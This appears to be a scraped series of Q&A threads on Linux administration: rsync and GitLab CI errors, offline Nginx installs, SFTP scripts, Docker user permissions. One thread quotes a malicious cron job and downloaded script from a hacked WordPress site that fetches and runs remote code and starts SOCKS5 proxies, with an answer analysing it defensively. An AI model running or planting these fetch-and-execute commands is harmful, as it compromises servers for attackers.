when I push and that, on my server, I don't have my project, everything is fine (obviously):
rsync --exclude=".git" -e ssh -avz --delete-after . $SSH_USER#$SSH_HOST:blog_symfony/
building file list ... done
created directory blog_symfony
[...]
sent 44,533,927 bytes received 5,523 bytes 5,239,935.29 bytes/sec
total size is 238,959,003 speedup is 5.37
the problem when I push a 2nd time, it does anything to me:
rsync: [generator] delete_file: rmdir(project/blog_symfony/project/blog_symfony) failed: Permission denied (13)
rsync: [generator] delete_file: rmdir(project/blog_symfony) failed: Permission denied (13)
deleting project/blog_symfony/translations/.gitignore
deleting project/blog_symfony/translations/
[...]
it creates for me, on my server side, a 'project' folder in the blog_symfony folder
annot delete non-empty directory: project/blog_symfony
cannot delete non-empty directory: project
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1207) [sender=3.1.3]
sent 13,924 bytes received 175 bytes 28,198.00 bytes/sec
total size is 238,959,004 speedup is 16,948.65
Cleaning up project directory and file based variables 00:01
ERROR: Job failed: exit code 1
my gitlab-ci:
before_script:
- 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )'
- eval $(ssh-agent -s)
- echo "$SSH_PRIVATE_KEY" | tr -d '\r' | ssh-add -
- mkdir -p ~/.ssh
- chmod 700 ~/.ssh
- '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" >> ~/.ssh/config'
script:
- ls
- apt-get update && apt-get install rsync -y
- ssh $SSH_USER#$SSH_HOST "ls"
- rsync --exclude=".git" -e ssh -avz --delete-after . $SSH_USER#$SSH_HOST:blog_symfony/
- ssh $SSH_USER#$SSH_HOST "cd blog_symfony && docker-compose build && docker-compose up"
in ls -l I have a folder written by rsync and which is impossible to remove from gitlab-ci:
drwxrwxr-x 3 root root 4096 Dec 14 23:26 project
I don't think this is normal. This is the first time that I use gitlab-ci for a symfony project.
Thank you for your help
ls -l: I have a folder written by rsync and which is impossible to remove from GitLab CI.
Check if that folder is instead created after the first execution of your docker-compose up: if your Docker image execute itself internally as USER root, using a bind mount, it would write files/folders as root.
And that would impede normal operation (on the server, outside the container), like your rsync, because root files would be i the way.
Related
I need to install Nginx on my target which there is no internet connection, how can I install Nginx with all dependencies in an offline mode?? thanks in advance for your answers.
I have recently gone through this procedure and this is what worked for me on centos7:
You need an online Linux server to download dependencies. You can use virtual machines or anything else.
On your online server create a .sh file and copy script below in it. (I named it download_dependencies)
#!/bin/bash
# This script is used to fetch external packages that are not available in standard Linux distribution
# Example: ./fetch-external-dependencies ubuntu18.04
# Script will create nms-dependencies-ubuntu18.04.tar.gz in local directory which can be copied
# into target machine and packages inside can be installed manually
set -eo pipefail
# current dir
PACKAGE_PATH="."
mkdir -p $PACKAGE_PATH
declare -A CLICKHOUSE_REPO
CLICKHOUSE_REPO['ubuntu18.04']="https://repo.clickhouse.tech/deb/lts/main"
CLICKHOUSE_REPO['ubuntu20.04']="https://repo.clickhouse.tech/deb/lts/main"
CLICKHOUSE_REPO['centos7']="https://repo.clickhouse.tech/rpm/lts/x86_64"
CLICKHOUSE_REPO['centos8']="https://repo.clickhouse.tech/rpm/lts/x86_64"
CLICKHOUSE_REPO['rhel7']="https://repo.clickhouse.tech/rpm/lts/x86_64"
CLICKHOUSE_REPO['rhel8']="https://repo.clickhouse.tech/rpm/lts/x86_64"
declare -A NGINX_REPO
NGINX_REPO['ubuntu18.04']="https://nginx.org/packages/mainline/ubuntu/pool/nginx/n/nginx/"
NGINX_REPO['ubuntu20.04']="https://nginx.org/packages/mainline/ubuntu/pool/nginx/n/nginx/"
NGINX_REPO['centos7']="https://nginx.org/packages/mainline/centos/7/x86_64/RPMS/"
NGINX_REPO['centos8']="https://nginx.org/packages/mainline/centos/8/x86_64/RPMS/"
NGINX_REPO['rhel7']="https://nginx.org/packages/mainline/rhel/7/x86_64/RPMS/"
NGINX_REPO['rhel8']="https://nginx.org/packages/mainline/rhel/8/x86_64/RPMS/"
CLICKHOUSE_KEY="https://repo.clickhouse.com/CLICKHOUSE-KEY.GPG"
NGINX_KEY="https://nginx.org/keys/nginx_signing.key"
declare -A CLICKHOUSE_PACKAGES
# for Clickhouse package names are static between distributions
# we use ubuntu/centos entries as placeholders
CLICKHOUSE_PACKAGES['ubuntu']="
clickhouse-server_21.3.10.1_all.deb
clickhouse-common-static_21.3.10.1_amd64.deb"
CLICKHOUSE_PACKAGES['centos']="
clickhouse-server-21.3.10.1-2.noarch.rpm
clickhouse-common-static-21.3.10.1-2.x86_64.rpm"
CLICKHOUSE_PACKAGES['ubuntu18.04']=${CLICKHOUSE_PACKAGES['ubuntu']}
CLICKHOUSE_PACKAGES['ubuntu20.04']=${CLICKHOUSE_PACKAGES['ubuntu']}
CLICKHOUSE_PACKAGES['centos7']=${CLICKHOUSE_PACKAGES['centos']}
CLICKHOUSE_PACKAGES['centos8']=${CLICKHOUSE_PACKAGES['centos']}
CLICKHOUSE_PACKAGES['rhel7']=${CLICKHOUSE_PACKAGES['centos']}
CLICKHOUSE_PACKAGES['rhel8']=${CLICKHOUSE_PACKAGES['centos']}
declare -A NGINX_PACKAGES
NGINX_PACKAGES['ubuntu18.04']="nginx_1.21.3-1~bionic_amd64.deb"
NGINX_PACKAGES['ubuntu20.04']="nginx_1.21.2-1~focal_amd64.deb"
NGINX_PACKAGES['centos7']="nginx-1.21.4-1.el7.ngx.x86_64.rpm"
NGINX_PACKAGES['centos8']="nginx-1.21.4-1.el8.ngx.x86_64.rpm"
NGINX_PACKAGES['rhel7']="nginx-1.21.4-1.el7.ngx.x86_64.rpm"
NGINX_PACKAGES['rhel8']="nginx-1.21.4-1.el8.ngx.x86_64.rpm"
download_packages() {
local target_distribution=$1
if [ -z $target_distribution ]; then
echo "$0 - no target distribution specified"
exit 1
fi
mkdir -p "${PACKAGE_PATH}/${target_distribution}"
# just in case delete all files in target dir
rm -f "${PACKAGE_PATH}/${target_distribution}/*"
readarray -t clickhouse_files <<<"${CLICKHOUSE_PACKAGES[${target_distribution}]}"
readarray -t nginx_files <<<"${NGINX_PACKAGES[${target_distribution}]}"
echo "Downloading Clickhouse signing keys"
curl -fs ${CLICKHOUSE_KEY} --output "${PACKAGE_PATH}/${target_distribution}/clickhouse-key.gpg"
echo "Downloading Nginx signing keys"
curl -fs ${NGINX_KEY} --output "${PACKAGE_PATH}/${target_distribution}/nginx-key.gpg"
for package_file in "${clickhouse_files[#]}"; do
if [ -z $package_file ]; then
continue
fi
file_url="${CLICKHOUSE_REPO[$target_distribution]}/$package_file"
save_file="${PACKAGE_PATH}/${target_distribution}/$package_file"
echo "Fetching $file_url"
curl -fs $file_url --output $save_file
done
for package_file in "${nginx_files[#]}"; do
if [ -z $package_file ]; then
continue
fi
file_url="${NGINX_REPO[$target_distribution]}/$package_file"
save_file="${PACKAGE_PATH}/${target_distribution}/$package_file"
echo "Fetching $file_url"
curl -fs $file_url --output $save_file
done
bundle_file="${PACKAGE_PATH}/nms-dependencies-${target_distribution}.tar.gz"
tar -zcf $bundle_file -C "${PACKAGE_PATH}/${target_distribution}" .
echo "Bundle file saved as $bundle_file"
}
target_distribution=$1
if [ -z $target_distribution ]; then
echo "Usage: $0 target_distribution"
echo "Supported target distributions: ${!CLICKHOUSE_REPO[#]}"
exit 1
fi
# check if target distribution is supported
if [ -z ${CLICKHOUSE_REPO[$target_distribution]} ]; then
echo "Target distribution is not supported."
echo "Supported distributions: ${!CLICKHOUSE_REPO[#]}"
exit 1
fi
download_packages "${target_distribution}"
Then on the same directory that contains download_dependencies.sh run command below:
download_dependencies.sh <your linux version>
In my case, I ran code below (leave it blank to see options):
download_dependencies.sh centos7
It should start to download and when it finished you should see nms-dependencies-rhel7.tar.gz in your directory.
Copy that file(.tar.gz) to your offline target.
Now on your target machine, go to directory which you copied your file and run the code below:
tar -zxvf nms-dependencies-rhel7.tar.gz
sudo yum install *.rpm
After installation you can start nginx using systemctl:
sudo systemctl start clickhouse-server
sudo systemctl start nginx
Your nginx service must be running now!
you can download tar file in another system and copy
did you try this link?
https://gist.github.com/taufiqibrahim/d7f697de6bb8b93ca348a5b94d6adbfc
I have two AIX SFTP servers.
I want to move multiple files starting from word cash, e.g. cash2001.txt from one server to another using an sftp script and then want to delete the successfully moved files from the original server.
I have tried blow script but its not working
sftp -P 10022 EUSER_20233#11.214.6.920 <<EOF
put /data/sftp/current/cash*
exit
rm /data/sftp/current/cash*
EOF
As the rm should be deleting local files, you must execute it in shell, not in sftp:
sftp -P 10022 EUSER_20233#11.214.6.920 <<EOF
put /data/sftp/current/cash*
exit
EOF
rm /data/sftp/current/cash*
You may want to improve your code to delete the files, when the transfer succeeds only. Based on How to confirm SFTP file delivery?, you can do (in bash, I do not know AIX):
sftp -P 10022 EUSER_20233#11.214.6.920 -b - <<EOF
put /data/sftp/current/cash*
exit
EOF
if [ $? -eq 0 ]
then
rm /data/sftp/current/cash*
fi
I am currently working on a research tool that is supposed to be containerized using docker to hopefully be run on as many different systems as possible. This works fine for the most part, we have run into a permission problem because of the workflow though: The tool takes an input file (which we mount into the container), evaluates it using R scripts and is then supposed to generate a report on the input file exactly where the file was taken from on the host system.
The latter part is problematic as at least in our university context, the internal container user lacks write permissions in the (non-root) user home folders, which we are currently taking our testing data from. This would obviously also be bad in a production context as we don't know how the potential users' system is set up, which is why we are trying to dynamically and temporarily set the permissions of the container user to the host user.
I have found different solutions that involve passing the UID/GID to the docker daemon when building the container in some way or another:
docker build --build-arg USER_ID=$(id -u ${USER}) --build-arg GROUP_ID=$(id -g ${USER}) -t IMAGE .
I also changed the dockerfile accordingly using a tutorial that suggested replacing the internal www-data user:
[...Package installation steps that are supposed to be run as root...]
ARG USER_ID
ARG GROUP_ID
RUN if [ ${USER_ID:-0} -ne 0 ] && [ ${GROUP_ID:-0} -ne 0 ]; then \
userdel -f www-data &&\
if getent group www-data ; then groupdel www-data; fi &&\
groupadd -g ${GROUP_ID} www-data &&\
useradd -l -u ${USER_ID} -g www-data www-data &&\
install -d -m 0755 -o www-data -g www-data /work/ &&\
chown --changes --silent --no-dereference --recursive \
--from=33:33 ${USER_ID}:${GROUP_ID} \
/work \
;fi
USER www-data
WORKDIR /work
RUN mkdir files
COPY data/ /opt/MTB/data/
COPY helpers/ /opt/MTB/helpers/
COPY src/www/ /opt/MTB/www/
COPY tmp/ /opt/MTB/tmp/
COPY example_data/ /opt/MTB/example_data/
COPY src/ /opt/MTB/src/
EXPOSE 8080
ENTRYPOINT ["/opt/MTB/src/starter_s_c.sh"]
The entrypoint script starter_s_c.sh is a small bashscript that feeds the trailing argument to the corresponding R script as an input file - the R script writes the report.
This works, but requires the container to be built again for every new user. What we are looking for is a solution that handles the dynamic permission setting at runtime, so that we only have to build the container once and can use it with many different user configurations.
I have found this but I am not entirely sure how to implement it as it would replace our entrypoint script and I'm not sure how to integrate this solution into our project.
Here is our current entrypoint script which already needs the permissions to be set so localmaster.r can generate the report in the host directory:
#!/bin/sh
file="$1"
cd $(dirname $0)/..
if [ $# -eq 0 ]; then
echo '.libPaths(c("~/lib/R/library", .libPaths())); library(shiny); library(shinyjs); runApp("src")' | R --vanilla
else
echo "Rscript --vanilla /opt/MTB/src/localmaster.r "$file""
Rscript --vanilla /opt/MTB/src/localmaster.r "$file"
fi
(If no arguments are given, it starts a shiny app, just to avoid confusion)
Any help or tips would be much appreciated! Thank you.
Apparently I site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in wordpress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
the file it was pulling is this (obviously, don't try to execute this...)
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, It kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl which can be downloaded from sourceforge. The version used here differs from the sourceforge in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script, rather than passed on in on the command line. I suspect that the purpose of the latter change is make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax and see if you see that command. If you do it, use the kill command to stop it.
I would like to use rsync to synchronise my /rsync folder.
I create the rsync users on my 2 servers and configure the ssh key.
I installed rsync, created /rsync folder put chmod 777 on it.
But when I execute
rsync -avz -e ssh rsync#1.2.3.4:/rsync /rsync -p 8682
I have
Unexpected local arg: /rsync
If arg is a remote file/dir, prefix it with a colon (:).
rsync error: syntax or usage error (code 1) at main.c(1246) [Receiver=3.0.9]
("ssh rsync#1.2.3.4 -p 8682" works)
rsync -avz -e 'ssh -p 8682' rsync#1.2.3.4:/rsync /rsync